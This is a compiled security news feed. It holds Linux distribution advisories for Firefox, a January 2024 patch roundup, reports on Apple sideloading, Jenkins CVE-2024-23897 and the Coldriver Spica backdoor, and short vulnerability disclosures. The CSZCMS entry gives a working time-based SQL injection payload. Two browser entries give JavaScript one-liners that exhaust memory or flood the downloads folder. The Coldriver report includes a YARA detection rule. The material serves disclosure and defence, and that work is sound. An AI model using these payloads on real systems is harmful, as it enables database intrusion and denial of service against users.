Red Hat Security Advisory 2024-0618-03 - An update for firefox is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support, Red Hat Enterprise Linux 8.2 Telecommunications Update Service, and Red Hat Enterprise Linux 8.2 Update Services for SAP Solutions. Issues addressed include bypass, out of bounds write, and privilege escalation vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0618.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: firefox security update  
Advisory ID:        RHSA-2024:0618-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:0618  
Issue date:         2024-01-31  
Revision:           03  
CVE Names:          CVE-2024-0741  
====================================================================

Summary: 

An update for firefox is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support, Red Hat Enterprise Linux 8.2 Telecommunications Update Service, and Red Hat Enterprise Linux 8.2 Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.

This update upgrades Firefox to version 115.7.0 ESR.

Security Fix(es):

* Mozilla: Out of bounds write in ANGLE (CVE-2024-0741)

* Mozilla: Failure to update user input timestamp (CVE-2024-0742)

* Mozilla: Crash when listing printers on Linux (CVE-2024-0746)

* Mozilla: Bypass of Content Security Policy when directive unsafe-inline was set (CVE-2024-0747)

* Mozilla: Phishing site popup could show local origin in address bar (CVE-2024-0749)

* Mozilla: Potential permissions request bypass via clickjacking (CVE-2024-0750)

* Mozilla: Privilege escalation through devtools (CVE-2024-0751)

* Mozilla: HSTS policy on subdomain could bypass policy of upper domain (CVE-2024-0753)

* Mozilla: Memory safety bugs fixed in Firefox 122, Firefox ESR 115.7, and Thunderbird 115.7 (CVE-2024-0755)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-0741

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2259926  
https://bugzilla.redhat.com/show_bug.cgi?id=2259927  
https://bugzilla.redhat.com/show_bug.cgi?id=2259928  
https://bugzilla.redhat.com/show_bug.cgi?id=2259929  
https://bugzilla.redhat.com/show_bug.cgi?id=2259930  
https://bugzilla.redhat.com/show_bug.cgi?id=2259931  
https://bugzilla.redhat.com/show_bug.cgi?id=2259932  
https://bugzilla.redhat.com/show_bug.cgi?id=2259933  
https://bugzilla.redhat.com/show_bug.cgi?id=2259934

Red Hat Security Advisory 2024-0618-03

Plus: Google fixes dozens of Android bugs, Microsoft rolls out nearly 50 patches, Mozilla squashes 15 Firefox flaws, and more.

Later in January, Google released Chrome 121 to the stable channel, fixing 17 security issues, three of which are rated as having a high impact. These include CVE-2024-0807, a use-after-free flaw in WebAudio, and CVE-2024-0812, an inappropriate implementation vulnerability in accessibility. The final high-impact vulnerability is CVE-2024-0808, an integer underflow in WebUI.

Obviously, these updates are important, so check and apply them as soon as you can.

Microsoft

Microsoft’s January Patch Tuesday squashes nearly 50 bugs in its popular software, including 12 remote code execution (RCE) flaws.

No security holes included in this month’s set of updates are known to have been used in attacks, but notable flaws include CVE-2024-20677, a bug in Microsoft Office that could allow attackers to create malicious documents with embedded FBX 3D model files to execute code.

To mitigate this vulnerability, the ability to insert FBX files has been disabled in Word, Excel, PowerPoint, and Outlook for Windows and Mac. Versions of Office that had this feature enabled will no longer have access to it, Microsoft said.

Meanwhile, CVE-2024-20674 is a Windows Kerberos security feature bypass vulnerability rated as critical with a CVSS score of 8.8. In one scenario for this vulnerability, the attacker could convince a victim to connect to an attacker-controlled malicious application, Microsoft said. “Upon connecting, the malicious server could compromise the protocol,” the software giant added.

Mozilla Firefox

Hot on the heels of its market-dominant competitor Chrome, Mozilla’s Firefox has patched 15 security flaws in its latest update. Five of the bugs are rated as having a high severity, including CVE-2024-0741, an out-of-bounds write issue in Angle that could allow an attacker to corrupt memory, leading to an exploitable crash.

An unchecked return value in TLS handshake code tracked as CVE-2024-0743 could also cause an exploitable crash.

CVE-2024-0755 covers memory safety bugs fixed in Firefox 122, Firefox ESR 115.7, and Thunderbird 115.7. “Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code,” Mozilla said.

Cisco

Enterprise software giant Cisco has patched a vulnerability in multiple Cisco Unified Communications and Contact Center Solutions products that could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device.

Tracked as CVE-2024-20253 and with a whopping CVSS score of 9.9, Cisco said an attacker could exploit the vulnerability by sending a crafted message to a listening port of an affected device.

“A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system with the privileges of the web services user,” Cisco said. “With access to the underlying operating system, the attacker could also establish root access on the affected device,” it warned.

SAP

SAP has issued 10 new security fixes as part of its January Security Patch Day, which includes several issues with a CVSS score of 9.1. CVE-2023-49583 is an escalation-of-privilege issue in applications developed through SAP Business Application Studio, SAP Web IDE Full-Stack, and SAP Web IDE for SAP HANA.

Meanwhile, CVE-2023-50422 and CVE-2023-49583 are escalation-of-privilege issues in SAP Edge Integration Cell.

Another notable flaw is CVE-2024-21737, a code injection vulnerability in SAP Application Interface Framework, which has a CVSS score of 8.4. “A vulnerable function module of the application allows an attacker to traverse through various layers and execute OS commands directly,” security firm Onapsis said. “Successful exploits can cause considerable impact on confidentiality, integrity, and availability of the application.”

Apple and Google Just Patched Their First Zero-Day Flaws of the Year

To comply with the EU's Digital Markets Act, Apple will allow European iPhone owners to install apps obtained from outside the official App store.

Despite several warnings about the risks, Apple will allow European iPhone owners to install apps obtained from outside the official App store (sideloading).

These drastic changes are brought about to comply with the European Union’s (EU) Digital Markets Act (DMA). The Digital Markets Act (DMA) establishes a set of clearly defined objective criteria to identify “gatekeepers”. Gatekeepers are large digital platforms providing so called core platform services, such as for example online search engines, app stores, and messenger services.

The Digital Markets Act aims to regulate the gatekeeper power of the largest digital companies. The EU designated iOS, Safari, and the App Store as “core platform services” under the Digital Markets Act. According to the DMA, Apple as it is now has a monopoly in the App Store, and will no longer be allowed to use that to enforce a monopoly in payments in apps.

For reference, something similar happened when the US accused Microsoft of illegally monopolizing the web browser market for Windows. A few law cases later they reached a settlement in which Microsoft agreed to modify some of its business practices, opening up the opportunity for Windows users to switch to other browsers.

The Apple Newsroom says:

> “The changes include more than 600 new APIs, expanded app analytics, functionality for alternative browser engines, and options for processing app payments and distributing iOS apps.”

But Apple also warns very firmly about the consequences.

> “The new options for processing payments and downloading apps on iOS open new avenues for malware, fraud and scams, illicit and harmful content, and other privacy and security threats.”

Another big change is that web browsers won’t be forced to use Safari’s WebKit engine, opening the space for Chromium based browsers and a more desktop-alike feel for Firefox.

The fact that Apple only allows other browsers to drop WebKit in Europe means that browser developers are forced to make hard choices. Mozilla spokesperson Damiano DeMonte tells The Verge it’s extremely disappointed with the way things turned out.

> “We are still reviewing the technical details but are extremely disappointed with Apple’s proposed plan to restrict the newly-announced BrowserEngineKit to EU-specific apps. The effect of this would be to force an independent browser like Firefox to build and maintain two separate browser implementations — a burden Apple themselves will not have to bear.”

We asked Malwarebytes Director of Core Technology and resident Apple expert Thomas Reed how he felt about the announced changes and the associated risks.

Thomas is waiting for more details as well, but he expects that Apple will use the experience it gathered with macOS by nature of its openness and only open it up only as much as it is forced to, and no more. Thomas expects Apple to impose notarization on iOS apps from outside the App Store, just as they did for macOS.

> “If they completely open up iOS to the same degree as macOS, I think there will be some inevitable malware, adware, and PUP issues. The biggest problem with iOS currently is PUPs and scam apps that manage to get past the review process. I think those will also be a problem with apps from outside the App Store, and I think Apple will combat those similarly. Which is to say, far from perfectly.”

Developers can get acquainted with these changes on the Apple Developer Support page and start testing new capabilities in the iOS 17.4 beta. The new capabilities will become available to users in the 27 EU countries around the beginning of March 2024.

Don’t rely on the fact that this will be limited to the EU. Although the most significant app policy changes apply only to EU countries, other shifts concerning cloud gaming and in-app purchases will take effect worldwide.

**We don’t just report on iOS security—we provide it**

Cybersecurity risks should never spread beyond a headline. Keep threats off your iOS devices by downloading Malwarebytes for iOS today.

 Apple warns of &#8220;privacy and security threats&#8221; after EU requires it to allow sideloading 

By Deeba Ahmed
The vulnerabilities stem from the way Jenkins handles user-supplied data.
This is a post from HackRead.com Read the original post: Excessive Expansion Vulnerabilities Leave Jenkins Servers Open to Attacks

The Jenkins Security team was notified of the reported issues in November 2023, which were confirmed and fixed by the vendor the same month and fixed in January 2024.

Sonar’s Vulnerability Research Team has discovered security vulnerabilities in Jenkins, an open-source CI/CD software. These vulnerabilities, which the company refers to as ‘Excessive Expansion,’ allow unauthorized attackers to read and execute arbitrary code on the server, potentially escalating privileges to admins.

For your information, Jenkins is a popular automation server used to automate the software development lifecycle, with a market share of 44% in 2023. The potential impact of security vulnerabilities on end-users is, therefore, significant.

Two vulnerabilities were identified in Jenkins software tracked as CVE-2024-23897 and CVE-2024-23898. The first leverages the “expandAtFiles” functionality to allow arbitrary file reading and code execution, and the second allows arbitrary command execution by manipulating users to visit malicious links.

The vulnerabilities stem from the way Jenkins handles user-supplied data. CVE-2024-23897 allows unauthorized adversaries with “overall/read” permission to read arbitrary files on the Jenkins controller file system. However, even without these permissions, they can read the first few lines of files due to the built-in command line interface (CLI) that uses the args4j library to parse command arguments and options on the Jenkins controller.

This allows attackers to expand arguments from a file on the Jenkins instance and potentially leak file contents. The default character encoding allows attackers with Overall/Read permission to read entire files, and those without the permission can read the first few lines. Unfortunately, this feature is enabled by default, and disabling it isn’t an option in Jenkins 2.441 and LTS 2.426.2 or earlier versions.

Unauthenticated attackers can access the system with Read permission if they meet certain conditions, including enabling legacy mode authorization, signup feature, and “Allow anonymous read access” configuration. This allows users to access the basic Jenkins API, object APIs, people directory, and agents, while administrators can access everything on a Jenkins instance. Researchers successfully read files without plugins, but couldn’t identify plugins that can increase line count.

CVE-2024-23898 is a high-severity, cross-site WebSocket hijacking (CSWSH) vulnerability, which allows attackers to execute CLI commands by manipulating victims to click on links. Modern web browsers, like Safari and Firefox, have a “lax by default” policy to protect against a vulnerability but it isn’t strictly enforced.

Due to potential bypass techniques and outdated browsers, this vulnerability is assigned a High severity classification. Browsers don’t enforce SOP and CORS policies on WebSockets, as they work over WS(WebSocket) or WSS(WebSocketSecure) protocols. WebSockets can be used by any website to invoke Jenkins-CLI commands with the victim’s identity, similar to CSRF vulnerabilities without Jenkins-crumb or Origin header check.

The Jenkins Security team was notified of the reported issues in November 2023, which were confirmed and fixed by the vendor the same month and fixed in January 2024. The vendor fixed CVE-2024-23897 and CVE-2024-23898 by enabling secure configuration and origin verification for WebSocket endpoints, allowing administrators to override the default behaviour. Developers/users must immediately apply patches released in Jenkins versions 2.442 and LTS 2.426.3.

For insights, we reached out to John Gallagher, Vice President of Viakoo Labs at Viakoo who stated that “The urgency behind users patching their Jenkins servers immediately is driven by POC exploits already being published on GitHub, and the severity level is extremely high.”  

“With this CVE, agile development teams using Jenkins are ideal vehicles for introducing and spreading vulnerabilities; that’s the real risk here.  If successful, threat actors could use this exploit to infect many independent software distributions,” John explained.

“As with many open-source projects, patching is difficult because the size of teams using it tends to be small, their time pressure being agile is great, and there may be a false belief that other layers of security will offer protection. Having an accurate application inventory and automated patching solutions will reduce the time that threat actors can exploit this CVE,” he warned.

1.  **Ivanti VPN Zero-Day Flaws Fuel Widespread Cyber Attacks**
2.  **Hackers can hijack your Bosch Thermostat and Install Malware**
3.  **Critical “PixieFail” Flaws Expose Millions of Devices to Cyberattacks**
4.  **TeamViewer Exploited to Obtain Remote Access, Deploy Ransomware**
5.  **Windows Defender SmartScreen Flaw Exploited with Phemedrone Stealer**

Excessive Expansion Vulnerabilities Leave Jenkins Servers Open to Attacks

Ubuntu Security Notice 6610-1 - Multiple security issues were discovered in Firefox. If a user were tricked into opening a specially crafted website, an attacker could potentially exploit these to cause a denial of service, obtain sensitive information across domains, or execute arbitrary code. Cornel Ionce discovered that Firefox did not properly manage memory when opening the print preview dialog. An attacker could potentially exploit this issue to cause a denial of service.

    ==========================================================================Ubuntu Security Notice USN-6610-1January 29, 2024firefox vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTSSummary:Several security issues were fixed in Firefox.Software Description:- firefox: Mozilla Open Source web browserDetails:Multiple security issues were discovered in Firefox. If a user weretricked into opening a specially crafted website, an attacker couldpotentially exploit these to cause a denial of service, obtain sensitiveinformation across domains, or execute arbitrary code. (CVE-2024-0741,CVE-2024-0742, CVE-2024-0743, CVE-2024-0744, CVE-2024-0745, CVE-2024-0747,CVE-2024-0748, CVE-2024-0749, CVE-2024-0750, CVE-2024-0751, CVE-2024-0753,CVE-2024-0754, CVE-2024-0755)Cornel Ionce discovered that Firefox did not properly manage memory whenopening the print preview dialog. An attacker could potentially exploitthis issue to cause a denial of service. (CVE-2024-0746)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS:  firefox                         122.0+build2-0ubuntu0.20.04.1After a standard system update you need to restart Firefox to make all thenecessary changes.References:  https://ubuntu.com/security/notices/USN-6610-1  CVE-2024-0741, CVE-2024-0742, CVE-2024-0743, CVE-2024-0744,  CVE-2024-0745, CVE-2024-0746, CVE-2024-0747, CVE-2024-0748,  CVE-2024-0749, CVE-2024-0750, CVE-2024-0751, CVE-2024-0753,  CVE-2024-0754, CVE-2024-0755Package Information:  https://launchpad.net/ubuntu/+source/firefox/122.0+build2-0ubuntu0.20.04.1

Ubuntu Security Notice USN-6610-1

CSZCMS version 1.3.0 suffers from a remote SQL injection vulnerability in the admin flows.

    # Title:  CSZCMS v1.3.0 - SQL Injection# Author: Abdulaziz Almetairy# Date: 27/01/2024# Vendor: https://www.cszcms.com/# Software: https://sourceforge.net/projects/cszcms/files/install/CSZCMS-V1.3.0.zip/download# Reference: https://github.com/oh-az# Tested on: Windows 11, MySQL, Apache# 1 - Log in to the admin portalhttp://localhost/cszcms/admin/login# 2 - Navigate to General Menu > Member Users.# 3 Click the 'View' button next to any username.# 4 Intercept the requestGET /cszcms/admin/members/view/1 HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeCookie: 86112035d26bb3c291899278f9ab4fb2_cszsess=n5v1jcdqfjuuo32ng66e4rttg65ugdssUpgrade-Insecure-Requests: 1# 5 Modify the paramter /cszcms/admin/members/view/1to /cszcms/admin/members/view/'or(sleep(10))#and url encode all characters/cszcms/admin/members/view/%27%6f%72%28%73%6c%65%65%70%28%31%30%29%29%23%20Impact: Exploiting this SQL injection vulnerability allows an attacker to read sensitive data, enumerate database structures, and potentially cause denial of service through time-based SQL injection by manipulating queries to exploit delays in the application's response.Fix: Implement rigorous input validation and exclusively utilize prepared statements to prevent SQL injection vulnerabilities.

CSZCMS 1.3.0 SQL Injection

Chrome version 121 suffers from a javascript fork malloc vulnerability that indicates memory corruption upon crash.

    Searching the web for `javascript fork malloc bomb` returns results,e.g. [here][1]: and [here][2]:We got a javascript fork malloc bomb which crashed Chrome 121 on linuxwith SIGILL and about one in five runs the virtual machine freezes.SIGILL almost always is a sign of memory corruption :)On android it crashes the current tab without explanation.Firefox 121 on linux also crashes the current tab.In all cases except the sporadic freezes, the browser remains functioning,not counting the crashed tab.The javscript code is simply simple:`setInterval("document.body.innerHTML += document.body.innerHTML ",1);`[Online demo][3]: In case someone wants to test it on other browsersor debug.The GNU/linux tests took about 1.5 minutes in a virtual machine with4GB RAM and single core.[1]: http://wiki.glitchdata.com/index.php/Examples_of_fork_bombs#JavaScript[2]: https://gist.github.com/betandr/f0cbbb663accc3a76c11cc7661711566#javascript[3]: https://www.guninski.com/fork1.html

Chrome 121 Javascript Fork Malloc Bomb

Debian Linux Security Advisory 5606-1 - Multiple security issues have been found in the Mozilla Firefox web browser, which could potentially result in the execution of arbitrary code, phishing, clickjacking, privilege escalation, HSTS bypass or bypass of content security policies.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5606-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffJanuary 24, 2024                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : firefox-esrCVE ID         : CVE-2024-0741 CVE-2024-0742 CVE-2024-0746 CVE-2024-0747                  CVE-2024-0749 CVE-2024-0750 CVE-2024-0751 CVE-2024-0753                  CVE-2024-0755Multiple security issues have been found in the Mozilla Firefox webbrowser, which could potentially result in the execution of arbitrarycode, phishing, clickjacking, privilege escalation, HSTS bypass orbypass of content security policies.For the oldstable distribution (bullseye), these problems have been fixedin version 115.7.0esr-1~deb11u1.For the stable distribution (bookworm), these problems have been fixed inversion 115.7.0esr-1~deb12u1.We recommend that you upgrade your firefox-esr packages.For the detailed security status of firefox-esr please refer toits security tracker page at:https://security-tracker.debian.org/tracker/firefox-esrFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmWxXEUACgkQEMKTtsN8TjZPIQ/+PSv6op0tJDa5J/C5jJo3w7dic4eb29gwL0NawP7UCWyi5gV5T0auzFDGhWkdc11XhCOFmVdObwcwLMnlx+VYQV4262ZwO1bUDjFa959Cw9i4uVlacqzOIUbxdfFUyIIH92LZd7P0ln5OCmyKrw0CR/cgKacTYen3U6VGyOB1V7ux7IudUh2v19V+VH5pUhLxWPi8ff9PMkC10j0GUwKZI2QncJo5990yg8tKgXrhVC7DXU/R97WQ9+FwqBb6RBezjIGK+rgfPrXSIX7rMVvjNTd0r22bqCr3jk/gJEt/u/oWbPETNUOTXlhOe7R4SIobP9GIhiSlHmY8ZHovbvvy5xfayW4GmlFj6JKZ3hxLdJ3PDwwTulH52v+wPuTo6yWeSE8TJFFps0jxN5gKwp6G0dpdixLYrG1ntLqUeDwDlcvp6b+KuzTB+IyfkVrGIXX/8mPJIHXGU2bFFHJL0i/JX34aKno1G9O8TWHGg5K3KHXhkKmoWklaiwt5Fe71c215JuPVY2dDetCyrM+MubDRX9NxpW41K2fonou37xVquIqpj5WKjw9HacIlpIpBCNzs2vbOI0uTV2cUEJnsv1TPvaDa4VnKm9tF6IfGpyFoW5muAichyBJTieN5ramWR2qDHSdqOMAUSADO5aoGUv8Mn8L5+k2BJHsCLfHU4Xe1MwM==0gOJ-----END PGP SIGNATURE-----

Debian Security Advisory 5606-1

Russian state-sponsored actor Coldriver uses spear phishing attacks to install the Spica backdoor on victim systems.

Researchers at Google’s Threat Analysis Group (TAG) have published their findings about a group they have dubbed Coldriver. The main targets of the Coldriver group are high-profile individuals in non-governmental organizations (NGOs), former intelligence and military officials, and NATO governments. These targets are approached in spear phishing attacks.

The group uses social engineering techniques to persuade their targets to open documents or download malware. Their activities are aligned with those of the Russian government, so it’s pretty safe to say that Coldriver is a state-sponsored group.

In December 2023, the US charged two Russians believed to be members of this group, for their role in a campaign that hacked government accounts.

Microsoft, who tracks the group as Star Blizzard, says the group targets individuals and organizations involved in international affairs, defense, and logistics support to Ukraine, as well as academia, information security companies, and other entities aligning with Russian state interests.

Typically, the group creates an impersonation account that pretends to be an expert in a field the target might be interested in or that is somehow affiliated with the target. Once a relationship has been established, the target will receive a phishing link or a document containing such a link.

To gain trust, Coldriver uses social media and professional marketing systems to build a profile of its target. With that information the group sets up email contacts, social media and other networking accounts that align with the target’s interests and appear legitimate.

Coldriver uses webmail addresses from different providers, including Outlook, Gmail, Yahoo and Proton Mail in the initial approach, impersonating known contacts of the target or well-known names in the target’s field of interest or sector. The group is also known to register malicious domains that mimic legitimate organizations.

Recently, TAG has noticed that the group uses “lure documents” to install a backdoor on the target’s system. These lure documents, which are harmless PDF files, are sent to the target, but when they open them the content appears to be encrypted.

When the target queries about the encryption, Coldriver sends the target a link to a decryption utility, typically hosted on a cloud storage site. This so-called decryption utility shows the target a normal PDF file, so that it appears as if the original was decrypted, but at the same time it installs a backdoor.

This backdoor is custom malware, likely developed by or for Coldriver, called Spica. Spica is written in the Rust programming language and supports, among others, these commands:

*   Execute arbitrary shell commands
*   Steal cookies from Chrome, Firefox, Opera, and Edge
*   Upload and download files
*   Analyze the filesystem by listing the content
*   Enumerate documents and copy them to an archive

The backdoor establishes persistence through an obfuscated PowerShell command that creates a scheduled task named CalendarChecker.

TAG suspects but has been unable to verify that there are multiple variants of Spica: one to match each lure document sent to targets.

**YARA rule**

YARA is a tool that can identify files that meet certain conditions. It is mainly in use by security researchers to classify malware.

TAG has created a YARA rule that cab help find the Spica backdoor.

rule SPICA\_\_Strings {  
meta:

author = “Google TAG”  
description = “Rust backdoor using websockets for c2 and embedded decoy PDF”  
hash = “37c52481711631a5c73a6341bd8bea302ad57f02199db7624b580058547fb5a9”  
strings:  
$s1 = “os\_win.c:%d: (%lu) %s(%s) – %s”  
$s2 = “winWrite1”  
$s3 = “winWrite2”  
$s4 = “DNS resolution panicked”  
$s5 = “struct Dox”  
$s6 = “struct Telegram”  
$s8 = “struct Download”  
$s9 = “spica”  
$s10 = “Failed to open the subkey after setting the value.”  
$s11 = “Card Holder: Bull Gayts”  
$s12 = “Card Number: 7/ 3310 0195 4865”  
$s13 = “CVV: 592”  
$s14 = “Card Expired: 03/28”

$a0 = “agent\\\\src\\\\archive.rs”  
$a1 = “agent\\\\src\\\\main.rs”  
$a2 = “agent\\\\src\\\\utils.rs”  
$a3 = “agent\\\\src\\\\command\\\\dox.rs”  
$a4 = “agent\\\\src\\\\command\\\\shell.rs”  
$a5 = “agent\\\\src\\\\command\\\\telegram.rs”  
$a6 = “agent\\\\src\\\\command\\\\mod.rs”  
$a7 = “agent\\\\src\\\\command\\\\mod.rs”  
$a8 = “agent\\\\src\\\\command\\\\cookie\\\\mod.rs”  
$a9 = “agent\\\\src\\\\command\\\\cookie\\\\browser\\\\mod.rs”  
$a10 = “agent\\\\src\\\\command\\\\cookie\\\\browser\\\\browser\_name.rs”  
condition:  
7 of ($s\*) or 5 of ($a\*)  
}

Our business solutions remove all remnants of ransomware and prevent you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

 Coldriver threat group targets high-ranking officials to obtain credentials 

Firefox version 121 and Chrome version 120 may both suffer from a minor denial of service issue with file downloads.

    Minor firefox DoS - semi silently polluting ~/Downloads with files (part 2)Tested on: firefox 121 and chrome 120 on GNU/linuxDate: Thu Jan 18 08:38:28 AM UTC 2024This is barely a DoS, but since it might affect Chrome too we decidedto disclose it.If firefox user visits a specially crafted page, then firefoxmay create many files in `~/Downloads`,The user is notified about this in a small dialog, but there isno option to stop the downloads.The potential denial of service is that the user must manuallydelete the created files and this might be PITA especially ona phone.The code basically is:<pre>URL = "data:text/plain;,a";//can be very large with no net trafficlink = document.createElement('a');link.href = URL;link.download = 'joro_';document.body.appendChild(link);function f() {if( !confirm("This will ruin your device with probability up to 199.99%"))    return;setInterval("link.click();",1);//dobro}f();</pre>There is no network traffic and in about 90 seconds firefox 121 created3434 files at speed about 38 files/second.google chrome 120 prompts about multiple downloads, and if the userallows it, it creates files at speed of 4.2 files/second, butit gives modal prompts, which we couldn't close from the GUI andhad to kill the process.[Test online][1]: if you are vulnerable[1]: https://j.ludost.net/download2.html-- guninski

Tag

#firefox